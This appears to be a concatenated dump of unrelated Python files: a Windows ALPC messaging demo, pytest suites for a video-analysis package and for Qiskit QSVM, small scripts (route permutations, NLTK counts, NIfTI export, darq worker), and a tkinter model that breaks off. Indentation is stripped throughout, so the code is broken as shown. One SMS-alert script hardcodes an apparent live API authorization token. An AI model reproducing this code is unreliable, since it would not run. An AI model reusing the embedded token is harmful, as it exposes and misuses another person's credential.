windows.utils.print_ctypes_struct(token_struct, " - TOKEN", hexa=True)
# We can reply by to way:
# - Send the same message with modified data
# - Recreate a Message and copy the MessageId
msg.data = "REQUEST '{0}' DONE".format(msg.data.decode()).encode()
sys.stdout.flush()
server.send(msg)
else:
print(ValueError("Unexpected message type <{0}>".format(msg.type & 0xfff)))
def send_message_with_handle(client):
print("")
print("[Client] == Sending a message with a handle ==")
# Craft a file with some data
f = tempfile.NamedTemporaryFile()
f.write(b"Tempfile data <3")
f.seek(0)
# New message with a Handle
msg = windows.alpc.AlpcMessage()
msg.attributes.ValidAttributes |= gdef.ALPC_MESSAGE_HANDLE_ATTRIBUTE
msg.handle_attribute.Flags = gdef.ALPC_HANDLEFLG_DUPLICATE_SAME_ACCESS
msg.handle_attribute.Handle = windows.utils.get_handle_from_file(f)
msg.handle_attribute.ObjectType = 0
msg.handle_attribute.DesiredAccess = 0
msg.data = b"some message with a file"
client.send_receive(msg)
def send_message_with_view(client):
print("")
print("[Client] == Sending a message with a view ==")
# Create View
section = client.create_port_section(0, 0, 0x4000)
view = client.map_section(section[0], 0x4000)
# New message with a View
msg = windows.alpc.AlpcMessage(0x2000)
msg.attributes.ValidAttributes |= gdef.ALPC_MESSAGE_VIEW_ATTRIBUTE
msg.view_attribute.Flags = 0
msg.view_attribute.ViewBase = view.ViewBase
msg.view_attribute.SectionHandle = view.SectionHandle
msg.view_attribute.ViewSize = 0x4000
msg.data = b"some message with a view"
windows.current_process.write_memory(view.ViewBase, b"The content of the view :)\x00")
client.send_receive(msg)
def alpc_client():
print("Client pid = {0}".format(windows.current_process.pid))
client = windows.alpc.AlpcClient()
# You can create a non-connected AlpcClient and send a custom
# 'AlpcMessage' for complexe alpc port connection.
connect_message = windows.alpc.AlpcMessage()
connect_message.data = b"Connection request client message"
print("[CLIENT] == Connecting to port ==")
connect_response = client.connect_to_port(PORT_NAME, connect_message)
print("[CLIENT] Connected with response: <{0}>".format(connect_response.data.decode()))
# AlpcClient send/recv/send_receive methods accept both string or
# AlpcMessage for complexe message.
print("")
print("[CLIENT] == Sending a message ==")
msg = windows.alpc.AlpcMessage()
msg.data = b"Complex Message 1"
print(" * Sending Message <{0}>".format(msg.data.decode()))
response = client.send_receive(msg)
print("[CLIENT] Server response: <{0}>".format(response.data.decode()))
print("[CLIENT] RESP Message Valid ATTRS = {0}".format(response.valid_attributes))
send_message_with_handle(client)
send_message_with_view(client)
sys.stdout.flush()
if __name__ == "__main__":
proc = multiprocessing.Process(target=full_alpc_server, args=())
proc.start()
import time; time.sleep(0.5)
alpc_client()
import time; time.sleep(0.5)
print("BYE")
proc.terminate() |
995,232 | 0164ecbcef801abb260951c425730593102749fb | import os
import pytest
from docker.errors import NotFound
from intervaltree import Interval, IntervalTree
from mexca.container import (
AudioTranscriberContainer,
BaseContainer,
FaceExtractorContainer,
SentimentExtractorContainer,
SpeakerIdentifierContainer,
VoiceExtractorContainer,
)
from mexca.data import (
AudioTranscription,
SentimentAnnotation,
SpeakerAnnotation,
TranscriptionData,
VideoAnnotation,
VoiceFeatures,
VoiceFeaturesConfig,
)
@pytest.mark.skip_os("Darwin")
class TestBaseContainer:
def test_invalid_image_name(self):
with pytest.raises(NotFound):
BaseContainer(image_name="sdfsdf")
@pytest.mark.run_env("face-extractor")
class TestFaceExtractorContainer:
filepath = os.path.join(
"tests", "test_files", "test_video_audio_5_seconds.mp4"
)
num_faces = 2
@pytest.fixture
def face_extractor(self):
return FaceExtractorContainer(
num_faces=self.num_faces, get_latest_tag=True
)
def test_apply(self, face_extractor):
result = face_extractor.apply(
self.filepath, batch_size=5, skip_frames=5
)
assert isinstance(result, VideoAnnotation)
@pytest.mark.run_env("speaker-identifier")
class TestSpeakerIdentifierContainer:
filepath = os.path.join(
"tests", "test_files", "test_video_audio_5_seconds.wav"
)
num_speakers = 2
@pytest.fixture
def speaker_identifier(self):
return SpeakerIdentifierContainer(
num_speakers=self.num_speakers,
use_auth_token=os.environ["HF_TOKEN"],
get_latest_tag=True,
)
def test_apply(self, speaker_identifier):
result = speaker_identifier.apply(self.filepath)
assert isinstance(result, SpeakerAnnotation)
@pytest.mark.run_env("voice-extractor")
class TestVoiceExtractorContainer:
filepath = os.path.join(
"tests", "test_files", "test_video_audio_5_seconds.wav"
)
num_faces = 2
@pytest.fixture
def voice_extractor(self):
return VoiceExtractorContainer(get_latest_tag=True)
@pytest.fixture
def config(self):
return VoiceFeaturesConfig(pitch_upper_freq=2000)
@pytest.fixture
def voice_extractor_config(self, config):
return VoiceExtractorContainer(config=config, get_latest_tag=True)
def test_apply(self, voice_extractor):
result = voice_extractor.apply(
self.filepath, time_step=0.2, skip_frames=1
)
assert isinstance(result, VoiceFeatures)
def test_apply_config(self, voice_extractor_config):
result = voice_extractor_config.apply(
self.filepath, time_step=0.2, skip_frames=1
)
assert isinstance(result, VoiceFeatures)
@pytest.mark.run_env("audio-transcriber")
class TestAudioTranscriberContainer:
filepath = os.path.join(
"tests", "test_files", "test_video_audio_5_seconds.wav"
)
annotation_path = os.path.join(
"tests",
"reference_files",
"test_video_audio_5_seconds_audio_annotation.rttm",
)
annotation = SpeakerAnnotation.from_rttm(annotation_path)
num_speakers = 2
@pytest.fixture
def audio_transcriber(self):
return AudioTranscriberContainer(
whisper_model="tiny", get_latest_tag=True
)
def test_apply(self, audio_transcriber):
result = audio_transcriber.apply(self.filepath, self.annotation)
assert isinstance(result, AudioTranscription)
@pytest.mark.run_env("sentiment-extractor")
class TestSentimentExtractorContainer:
transcription_path = os.path.join(
"tests",
"reference_files",
"test_video_audio_5_seconds_transcription.srt",
)
@pytest.fixture
def transcription(self):
transcription = AudioTranscription(
filename=self.transcription_path,
subtitles=IntervalTree(
[
Interval(
begin=0,
end=1,
data=TranscriptionData(
index=0, text="Today was a good day!", speaker="0"
),
)
]
),
)
return transcription
@pytest.fixture
def sentiment_extractor(self):
return SentimentExtractorContainer(get_latest_tag=True)
def test_apply(self, sentiment_extractor, transcription):
result = sentiment_extractor.apply(transcription)
assert isinstance(result, SentimentAnnotation)
|
995,233 | 9f0965f28a532888a49063a5719aea1b30ba72a3 | from sys import maxsize
from itertools import permutations
matriks = [
[0, 5, 9, 14, 16, 11, 21],
[5, 0, 17, 18, 12, 13, 8],
[9, 16, 0, 6, 23, 28, 20],
[14, 18, 6, 0, 31, 40, 37],
[16, 12, 23, 31, 0, 33, 19],
[11, 13, 28, 40, 33, 0, 4],
[21, 8, 20, 37, 19, 4, 0],
]
totalKota = len(matriks)
def jalanJalan(matr, awal):
jalanIndex = []
for i in range(totalKota):
if i != awal:
jalanIndex.append(i)
minJarak = maxsize
maxJarak = 0
ru = []
rut = []
kunjungann = []
kunjungan = permutations(jalanIndex)
for i in kunjungan:
totalJarak = 0
kotaSaatIni = awal
for x in i:
totalJarak += matr[kotaSaatIni][x]
kotaSaatIni = x
totalJarak += matr[kotaSaatIni][awal]
if maxJarak < totalJarak:
ru_pendek = [i,totalJarak]
maxJarak = totalJarak
elif minJarak > totalJarak:
rut_panjang = [i, totalJarak]
minJarak = totalJarak
kunjungann.append([i, totalJarak])
tengah = int(len(kunjungann) / 2)
kunjungann.sort()
rute_tengah = list(kunjungann[tengah][0])
mid = int(kunjungann[tengah][1])
#print('Rute tercepat adalah = {}'.format(list(rut_panjang[0])) % (minJarak) ('dengan total jarak adalah %d km'))
print('a. Rute tercepat (%d km) adalah {}'.format(list(rut_panjang[0])) % (minJarak))
print('b. Rute terpanjang (%d km) adalah {}'.format(list(ru_pendek[0])) % (maxJarak))
print('c. Rute alternatif adalah ', rute_tengah, 'dengan total jarak', mid, 'km')
if __name__ == '__main__':
jalanJalan(matriks, 0) |
995,234 | cb9e15e9e867eb4d9441defcce7475415528a04d | def even_number_of_evens(numbers):
if isinstance(numbers, list):
evens = sum([1 for num in numbers if num % 2 == 0])
return evens and evens % 2 == 0
else:
raise TypeError("A list was not passed into the function")
if __name__ == '__main__':
print(even_number_of_evens([1, 2, 4]))
|
995,235 | b47acfa160807ab3d4cd9a3b9cfd4d70a74586b6 | import nltk
from nltk.corpus import gutenberg
print(gutenberg.fileids())
words=gutenberg.words('bible-kjv.txt')
words_filtered=[e for e in words if len(e) >= 3]
stopwords=nltk.corpus.stopwords.words('english')
word=[w for w in words_filtered if w.lower() not in stopwords]
fdistPlain=nltk.FreqDist(words)
fdist=nltk.FreqDist(word)
print('most common word', fdist.most_common(10))
print('min common word', ) |
995,236 | 179db4a6d3c73bfd88fce8c1f04c58c949180ece | import requests
url = "https://www.fast2sms.com/dev/bulk"
def send_sms():
message = "BUDDY >> Unauthorized User tried to access your data."
number = '9162945996'
payload = "sender_id=FSTSMS&message=" + message +"&language=english&route=p&numbers="+ number
headers = {
'authorization': 'DAtOwPdYhy9nxNQbus5B6a38zc70I4vFGolHfXEJZCrUWMKemRpBqLVveU3DmKlcCTNnYdaErHZhS62O',
'Content-Type': "application/x-www-form-urlencoded",
'Cache-Control': "no-cache"
}
response = requests.request("POST", url, data=payload, headers=headers)
print(response.text)
|
995,237 | 81cef82d19708060a30c2791a005b006bd59d119 | ''' Triangle I '''
def main():
''' Pythagorus's Theorem '''
num1 = float(input())
tilted = num1
base = num1
num2 = float(input())
tilted = num2 if num2 > num1 else num1
base = num2 if num2 < num1 else num1
num3 = float(input())
tilted = num3 if num3 > num2 and num3 > num1 else num1 if num1 > num2 else num2
base = num3 if num3 < num2 and num3 < num1 else num1 if num1 < num2 else num2
hight = num1 + num2 + num3 - (tilted + base)
print(calcu(base, hight, tilted))
def calcu(numa, numb, numc):
''' for calculate '''
result = numa**2 + numb**2
result_much = result if result > numc else numc
if result == numc**2 or result_much - numc**2 <= 0.01:
return 'Yes'
return 'No'
main()
|
995,238 | a93faef5987e835204e5af686d968accd4710a67 | import numpy as np
from math import ceil, floor
class stat_record_class:
def __init__(self, lba_size_dist, lba_size_idx):
self.lba_size_dist = lba_size_dist
self.lba_size_idx = lba_size_idx
def lba_size_dist2(traces, access_type, options=1):
'''
Local Variables: lba_idx, b, cmd_id, access_mode, max_lba, idx_write, access_type, interval, stat_record, size_dist, idx_read, lba_size_idx, total_cmd, lba_dist_set_size, lba_size_dist, hbar, traces, options
Function calls: waitbar, max, ceil, zeros, close, lba_size_dist, mod, tic, find, size
function [stat_record]=lba_size_dist(lists_cmd, access_type,options)
--> calcuate the size distribution
inputs
traces=lists_cmd: n samples x 3 for LBA, size, flags
access_type: 0 write, 1 read, 2 all
options: control parameters
lba_size_set: how many LBA range sets
outputs
stat_record: statistics
Author: jun.xu99@gmail.com
'''
total_cmd=len(traces)
# size_dist=np.zeros((1024,2))
# lba_dist_set_size=options.lba_size_set
lba_dist_set_size=50
if access_type == 0:
idx_write=np.nonzero(traces[:,2] == 0)
max_lba=max(traces[idx_write,0].T)
else:
if access_type == 1:
idx_read=np.nonzero(traces[:,2] == 1)
max_lba=max(traces[idx_read,0].T)
else:
max_lba=max(traces[:,0].T)
interval=int(ceil(max_lba / lba_dist_set_size))
lba_size_dist=np.zeros((lba_dist_set_size,1024))
#lba_size_dist(:,1024)=0:interval:max_lba; #
for cmd_id in np.arange(0,total_cmd).reshape(-1):
#Get the trace information
access_mode=traces[cmd_id,2]
#Here, only read or write?
if (access_type == 0):
if access_mode == 1:
continue
else:
if access_type == 1:
if access_mode == 0:
continue
lba_idx=int(ceil(traces[cmd_id,0] / interval))
if lba_idx>=lba_dist_set_size:
lba_idx=lba_dist_set_size-1
lba_size_dist[lba_idx,traces[cmd_id,1]-1]=lba_size_dist[lba_idx,traces[cmd_id,1]-1] + 1
# print('lba_size_dist length is '+str(len(lba_size_dist)))
# print('starting to create a class')
stat_record=stat_record_class(lba_size_dist,0)
# print('starting to assign class value')
# stat_record.lba_size_dist = np.copy(lba_size_dist)
stat_record.lba_size_idx = np.copy(np.arange(0,max_lba,interval))
if len(stat_record.lba_size_idx) > lba_dist_set_size:
stat_record.lba_size_idx = np.copy(stat_record.lba_size_idx[np.arange(0,lba_dist_set_size)])
# print('finish and return')
return stat_record
# x=lba_size_dist2(lists_cmd, 0, options) |
995,239 | 4526f9eb950ebbdc72e0c2c475994733e13b4501 | import argparse
import pandas as pd
parser = argparse.ArgumentParser()
parser.add_argument("-p","--promoter", help="please provide a file containing promter tfbs", action = "store")
parser.add_argument("-t","--tf", help="please provide filename containing all tfbs", action = "store")
parser.add_argument("-o","--output", help="please provide an output file name", action = "store")
args = parser.parse_args()
out_path = args.output + "_results/"
all_tfbs = pd.read_csv(out_path + args.tf)
prom_tfbs = pd.read_csv(out_path + args.promoter)
prom_tfbs = prom_tfbs.drop_duplicates()
all_tfbs = all_tfbs.drop_duplicates()
common_genes = list(set.intersection(set(all_tfbs.Ensembl), set(prom_tfbs.Ensembl)))
all_tfbs = all_tfbs.loc[all_tfbs.Ensembl.isin(common_genes)]
prom_tfbs = prom_tfbs.loc[prom_tfbs.Ensembl.isin(common_genes)]
all_tfbs["reg_index"] = list(all_tfbs.index)
prom_tfbs_ind = prom_tfbs.merge(all_tfbs, on = list(prom_tfbs), how = "inner")
distal_tfbs = all_tfbs.loc[~all_tfbs.reg_index.isin(list(prom_tfbs_ind.reg_index))]
distal_tfbs = distal_tfbs.iloc[:,:5]
o_name = out_path + args.output + "_distal_tfbs.csv"
distal_tfbs.to_csv(o_name, index= False)
|
995,240 | c4c2f761609e45a9118b8bffca52694c716b6195 | # -*- coding: utf-8 -*-
from nipy.algorithms.registration.affine import Affine
import nibabel
def save_nifty(filename, data, origin=(0,0,0), vox_scale=(0,0,0),
angles=(0,0,0) ):
"""
save_nifty: write data to given file in nifty format, taking
care of the affine transform.
Inputs
------
filename : string
the file in which to put the output. If not given, the extension
.nii will be added.
data : 3d numpy array
the volume data to save. A single slice will be considered as
a 3d volume that is only one voxel thick in the through-plane
direction.
origin : 3-element sequence =(0,0,0)
the (x,y,z) physical coordinates of element (0,0,0) of the data.
vox_scale : 3-element sequence
the physical size of each voxel along the three axes, in the order
that the input data is given, i.e., the first value is the length
step along the first data axis. Typically in mm units.
angles : 3-element sequence
the (Euler) rotation angles about the three (data) axes, defining
the rotation data-coordinates->physical coordinates. See
nipy.algorithms.registration.affine.rotation_vec2mat for how
the calculation is performed.
If my assumption about what angles mean is wrong, alternative
explicit conversions are here:
http://nipy.org/nibabel/generated/nibabel.eulerangles.html
"""
aff = Affine()
aff.translation = origin
aff.scaling = vox_scale
aff.rotation = angles
nifti = nibabel.Nifti1Image(data, aff)
if not('.nii' in filename):
filename = filename + '.nii'
nifti.to_filename(filename) |
995,241 | 0acf422452c429c4272e852aa1c509e0d9aea3ee | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test QSVM """
import os
from test.aqua import QiskitAquaTestCase
import numpy as np
from qiskit import BasicAer
from qiskit.aqua import QuantumInstance, aqua_globals
from qiskit.aqua.components.feature_maps import SecondOrderExpansion
from qiskit.aqua.components.multiclass_extensions import (ErrorCorrectingCode,
AllPairs,
OneAgainstRest)
from qiskit.aqua.algorithms import QSVM
from qiskit.aqua.utils import get_feature_dimension
class TestQSVM(QiskitAquaTestCase):
""" Test QSVM """
def setUp(self):
super().setUp()
self.random_seed = 10598
self.shots = 12000
aqua_globals.random_seed = self.random_seed
self.training_data = {'A': np.asarray([[2.95309709, 2.51327412],
[3.14159265, 4.08407045]]),
'B': np.asarray([[4.08407045, 2.26194671],
[4.46106157, 2.38761042]])}
self.testing_data = {'A': np.asarray([[3.83274304, 2.45044227]]),
'B': np.asarray([[3.89557489, 0.31415927]])}
def test_qsvm_binary(self):
""" QSVM Binary test """
ref_kernel_training = np.array([[1., 0.85366667, 0.12341667, 0.36408333],
[0.85366667, 1., 0.11141667, 0.45491667],
[0.12341667, 0.11141667, 1., 0.667],
[0.36408333, 0.45491667, 0.667, 1.]])
ref_kernel_testing = np.array([[0.14316667, 0.18208333, 0.4785, 0.14441667],
[0.33608333, 0.3765, 0.02316667, 0.15858333]])
# ref_alpha = np.array([0.36064489, 1.49204209, 0.0264953, 1.82619169])
ref_alpha = np.array([0.34903335, 1.48325498, 0.03074852, 1.80153981])
# ref_bias = np.array([-0.03380763])
ref_bias = np.array([-0.03059226])
ref_support_vectors = np.array([[2.95309709, 2.51327412], [3.14159265, 4.08407045],
[4.08407045, 2.26194671], [4.46106157, 2.38761042]])
backend = BasicAer.get_backend('qasm_simulator')
num_qubits = 2
feature_map = SecondOrderExpansion(feature_dimension=num_qubits,
depth=2,
entangler_map=[[0, 1]])
svm = QSVM(feature_map, self.training_data, self.testing_data, None)
quantum_instance = QuantumInstance(backend,
shots=self.shots,
seed_simulator=self.random_seed,
seed_transpiler=self.random_seed)
try:
result = svm.run(quantum_instance)
np.testing.assert_array_almost_equal(
result['kernel_matrix_training'], ref_kernel_training, decimal=1)
np.testing.assert_array_almost_equal(
result['kernel_matrix_testing'], ref_kernel_testing, decimal=1)
self.assertEqual(len(result['svm']['support_vectors']), 4)
np.testing.assert_array_almost_equal(
result['svm']['support_vectors'], ref_support_vectors, decimal=4)
np.testing.assert_array_almost_equal(result['svm']['alphas'], ref_alpha, decimal=8)
np.testing.assert_array_almost_equal(result['svm']['bias'], ref_bias, decimal=8)
self.assertEqual(result['testing_accuracy'], 0.5)
except NameError as ex:
self.skipTest(str(ex))
def test_qsvm_binary_directly_statevector(self):
""" QSVM Binary Directly Statevector test """
ref_kernel_testing = np. array([[0.1443953, 0.18170069, 0.47479649, 0.14691763],
[0.33041779, 0.37663733, 0.02115561, 0.16106199]])
ref_support_vectors = np.array([[2.95309709, 2.51327412], [3.14159265, 4.08407045],
[4.08407045, 2.26194671], [4.46106157, 2.38761042]])
backend = BasicAer.get_backend('statevector_simulator')
num_qubits = 2
feature_map = SecondOrderExpansion(feature_dimension=num_qubits,
depth=2,
entangler_map=[[0, 1]])
svm = QSVM(feature_map, self.training_data, self.testing_data, None)
quantum_instance = QuantumInstance(backend, seed_transpiler=self.random_seed,
seed_simulator=self.random_seed)
file_path = self.get_resource_path('qsvm_test.npz')
try:
result = svm.run(quantum_instance)
ori_alphas = result['svm']['alphas']
np.testing.assert_array_almost_equal(
result['kernel_matrix_testing'], ref_kernel_testing, decimal=4)
self.assertEqual(len(result['svm']['support_vectors']), 4)
np.testing.assert_array_almost_equal(
result['svm']['support_vectors'], ref_support_vectors, decimal=4)
self.assertEqual(result['testing_accuracy'], 0.5)
svm.save_model(file_path)
self.assertTrue(os.path.exists(file_path))
loaded_svm = QSVM(feature_map)
loaded_svm.load_model(file_path)
np.testing.assert_array_almost_equal(
loaded_svm.ret['svm']['support_vectors'], ref_support_vectors, decimal=4)
np.testing.assert_array_almost_equal(
loaded_svm.ret['svm']['alphas'], ori_alphas, decimal=4)
loaded_test_acc = loaded_svm.test(svm.test_dataset[0],
svm.test_dataset[1],
quantum_instance)
self.assertEqual(result['testing_accuracy'], loaded_test_acc)
np.testing.assert_array_almost_equal(
loaded_svm.ret['kernel_matrix_testing'], ref_kernel_testing, decimal=4)
except NameError as ex:
self.skipTest(str(ex))
finally:
if os.path.exists(file_path):
try:
os.remove(file_path)
except Exception: # pylint: disable=broad-except
pass
def test_qsvm_setup_data(self):
""" QSVM Setup Data test """
ref_kernel_testing = np. array([[0.1443953, 0.18170069, 0.47479649, 0.14691763],
[0.33041779, 0.37663733, 0.02115561, 0.16106199]])
ref_support_vectors = np.array([[2.95309709, 2.51327412], [3.14159265, 4.08407045],
[4.08407045, 2.26194671], [4.46106157, 2.38761042]])
backend = BasicAer.get_backend('statevector_simulator')
num_qubits = 2
feature_map = SecondOrderExpansion(feature_dimension=num_qubits,
depth=2,
entangler_map=[[0, 1]])
try:
svm = QSVM(feature_map)
svm.setup_training_data(self.training_data)
svm.setup_test_data(self.testing_data)
quantum_instance = QuantumInstance(backend, seed_transpiler=self.random_seed,
seed_simulator=self.random_seed)
result = svm.run(quantum_instance)
np.testing.assert_array_almost_equal(
result['kernel_matrix_testing'], ref_kernel_testing, decimal=4)
self.assertEqual(len(result['svm']['support_vectors']), 4)
np.testing.assert_array_almost_equal(
result['svm']['support_vectors'], ref_support_vectors, decimal=4)
self.assertEqual(result['testing_accuracy'], 0.5)
except NameError as ex:
self.skipTest(str(ex))
def test_qsvm_multiclass_one_against_all(self):
""" QSVM Multiclass One Against All test """
training_input = {'A': np.asarray([[0.6560706, 0.17605998], [0.25776033, 0.47628296],
[0.8690704, 0.70847635]]),
'B': np.asarray([[0.38857596, -0.33775802], [0.49946978, -0.48727951],
[0.49156185, -0.3660534]]),
'C': np.asarray([[-0.68088231, 0.46824423], [-0.56167659, 0.65270294],
[-0.82139073, 0.29941512]])}
test_input = {'A': np.asarray([[0.57483139, 0.47120732], [0.48372348, 0.25438544],
[0.48142649, 0.15931707]]),
'B': np.asarray([[-0.06048935, -0.48345293], [-0.01065613, -0.33910828],
[0.06183066, -0.53376975]]),
'C': np.asarray([[-0.74561108, 0.27047295], [-0.69942965, 0.11885162],
[-0.66489165, 0.1181712]])}
total_array = np.concatenate((test_input['A'], test_input['B'], test_input['C']))
aqua_globals.random_seed = self.random_seed
feature_map = SecondOrderExpansion(feature_dimension=get_feature_dimension(training_input),
depth=2,
entangler_map=[[0, 1]])
try:
svm = QSVM(feature_map, training_input, test_input, total_array,
multiclass_extension=OneAgainstRest())
quantum_instance = QuantumInstance(BasicAer.get_backend('qasm_simulator'),
shots=self.shots,
seed_simulator=aqua_globals.random_seed,
seed_transpiler=aqua_globals.random_seed)
result = svm.run(quantum_instance)
expected_accuracy = 0.444444444
expected_classes = ['A', 'A', 'C', 'A', 'A', 'A', 'A', 'C', 'C']
self.assertAlmostEqual(result['testing_accuracy'], expected_accuracy, places=4)
self.assertEqual(result['predicted_classes'], expected_classes)
except NameError as ex:
self.skipTest(str(ex))
def test_qsvm_multiclass_all_pairs(self):
""" QSVM Multiclass All Pairs test """
training_input = {'A': np.asarray([[0.6560706, 0.17605998], [0.25776033, 0.47628296],
[0.8690704, 0.70847635]]),
'B': np.asarray([[0.38857596, -0.33775802], [0.49946978, -0.48727951],
[0.49156185, -0.3660534]]),
'C': np.asarray([[-0.68088231, 0.46824423], [-0.56167659, 0.65270294],
[-0.82139073, 0.29941512]])}
test_input = {'A': np.asarray([[0.57483139, 0.47120732], [0.48372348, 0.25438544],
[0.48142649, 0.15931707]]),
'B': np.asarray([[-0.06048935, -0.48345293], [-0.01065613, -0.33910828],
[0.06183066, -0.53376975]]),
'C': np.asarray([[-0.74561108, 0.27047295], [-0.69942965, 0.11885162],
[-0.66489165, 0.1181712]])}
total_array = np.concatenate((test_input['A'], test_input['B'], test_input['C']))
aqua_globals.random_seed = self.random_seed
feature_map = SecondOrderExpansion(feature_dimension=get_feature_dimension(training_input),
depth=2,
entangler_map=[[0, 1]])
try:
svm = QSVM(feature_map, training_input, test_input, total_array,
multiclass_extension=AllPairs())
quantum_instance = QuantumInstance(BasicAer.get_backend('qasm_simulator'),
shots=self.shots,
seed_simulator=aqua_globals.random_seed,
seed_transpiler=aqua_globals.random_seed)
result = svm.run(quantum_instance)
self.assertAlmostEqual(result['testing_accuracy'], 0.444444444, places=4)
self.assertEqual(result['predicted_classes'], ['A', 'A', 'C', 'A',
'A', 'A', 'A', 'C', 'C'])
except NameError as ex:
self.skipTest(str(ex))
def test_qsvm_multiclass_error_correcting_code(self):
""" QSVM Multiclass error Correcting Code test """
training_input = {'A': np.asarray([[0.6560706, 0.17605998], [0.25776033, 0.47628296],
[0.8690704, 0.70847635]]),
'B': np.asarray([[0.38857596, -0.33775802], [0.49946978, -0.48727951],
[0.49156185, -0.3660534]]),
'C': np.asarray([[-0.68088231, 0.46824423], [-0.56167659, 0.65270294],
[-0.82139073, 0.29941512]])}
test_input = {'A': np.asarray([[0.57483139, 0.47120732], [0.48372348, 0.25438544],
[0.48142649, 0.15931707]]),
'B': np.asarray([[-0.06048935, -0.48345293], [-0.01065613, -0.33910828],
[0.06183066, -0.53376975]]),
'C': np.asarray([[-0.74561108, 0.27047295], [-0.69942965, 0.11885162],
[-0.66489165, 0.1181712]])}
total_array = np.concatenate((test_input['A'], test_input['B'], test_input['C']))
aqua_globals.random_seed = self.random_seed
feature_map = SecondOrderExpansion(feature_dimension=get_feature_dimension(training_input),
depth=2,
entangler_map=[[0, 1]])
try:
svm = QSVM(feature_map, training_input, test_input, total_array,
multiclass_extension=ErrorCorrectingCode(code_size=5))
quantum_instance = QuantumInstance(BasicAer.get_backend('qasm_simulator'),
shots=self.shots,
seed_simulator=aqua_globals.random_seed,
seed_transpiler=aqua_globals.random_seed)
result = svm.run(quantum_instance)
self.assertAlmostEqual(result['testing_accuracy'], 0.444444444, places=4)
self.assertEqual(result['predicted_classes'], ['A', 'A', 'C', 'A',
'A', 'A', 'A', 'C', 'C'])
except NameError as ex:
self.skipTest(str(ex))
|
995,242 | baa769d87f7ac0d89e5f78229234c8405073ee5e | import logging
from typing import Any
import darq
from aiohttp_example import signals
log = logging.getLogger(__name__)
async def startup_services(ctx: dict[str, Any]) -> None:
ctx['_services'] = []
for init_async_gen in signals.get_cleanup_ctx_factories():
async_gen = init_async_gen(None)
await async_gen.__anext__()
ctx['_services'].append(async_gen)
async def shutdown_services(ctx: dict[str, Any]) -> None:
for async_gen in reversed(ctx['_services']):
try:
await async_gen.__anext__()
except StopAsyncIteration:
pass
async def on_worker_startup(ctx: dict[str, Any]) -> None:
logging.basicConfig(level=logging.INFO)
await startup_services(ctx)
async def on_worker_shutdown(ctx: dict[str, Any]) -> None:
await shutdown_services(ctx)
darq = darq.Darq(
redis_settings=darq.RedisSettings(host='redis'),
on_startup=on_worker_startup,
on_shutdown=on_worker_shutdown,
)
darq.autodiscover_tasks([
'aiohttp_example.apps.say_hello.tasks',
])
|
995,243 | 4004a5c6e204cac80858102dfe81869a77b03a4d | import tkinter as tk
import json
class Models(tk.StringVar):
def __init__(self, *args, **kwargs):
self.template_custom = {
'UNTREATED': {
'0': tk.StringVar(),
'1': tk.StringVar(),
'2': tk.StringVar(),
'3': tk.StringVar(),
'4': tk.StringVar(),
'5': tk.StringVar(),
'6': tk.StringVar(),
'7': tk.StringVar(),
'8': tk.StringVar(),
'9': tk.StringVar(),
'10': tk.StringVar(),
'11': tk.StringVar(),
'12': tk.StringVar(),
'13': tk.StringVar(),
'14': tk.StringVar(),
'15': tk.StringVar(),
'16': tk.StringVar(),
'17': tk.StringVar(),
'18': tk.StringVar(),
'19': tk.StringVar(),
'20': tk.StringVar(),
'21': tk.StringVar(),
'22': tk.StringVar(),
'23': tk.StringVar(),
'24': tk.StringVar(),
'25': tk.StringVar(),
'26': tk.StringVar(),
'27': tk.StringVar(),
'28': tk.StringVar(),
'29': tk.StringVar()
},
'TREATED': {
'0': tk.StringVar(),
'1': tk.StringVar(),
'2': tk.StringVar(),
'3': tk.StringVar(),
'4': tk.StringVar(),
'5': tk.StringVar(),
'6': tk.StringVar(),
'7': tk.StringVar(),
'8': tk.StringVar(),
'9': tk.StringVar(),
'10': tk.StringVar(),
'11': tk.StringVar(),
'12': tk.StringVar(),
'13': tk.StringVar(),
'14': tk.StringVar(),
'15': tk.StringVar(),
'16': tk.StringVar(),
'17': tk.StringVar(),
'18': tk.StringVar(),
'19': tk.StringVar(),
'20': tk.StringVar(),
'21': tk.StringVar(),
'22': tk.StringVar(),
'23': tk.StringVar(),
'24': tk.StringVar(),
'25': tk.StringVar(),
'26': tk.StringVar(),
'27': tk.StringVar(),
'28': tk.StringVar(),
'29': tk.StringVar()
},
'LENGTH': {
'0': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [2700, 3300, 3900, 4500, 4100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set': tk.StringVar()
},
'1': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'2': {
'normal': [6000, 6300, 6600]
},
'3': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'4': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'5': {
'normal': [6000, 6300, 6600]
},
'6': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'7': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'8': {
'normal': [6000, 6300, 6600]
},
'9': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'10': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'11': {
'normal': [6000, 6300, 6600]
},
'12': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
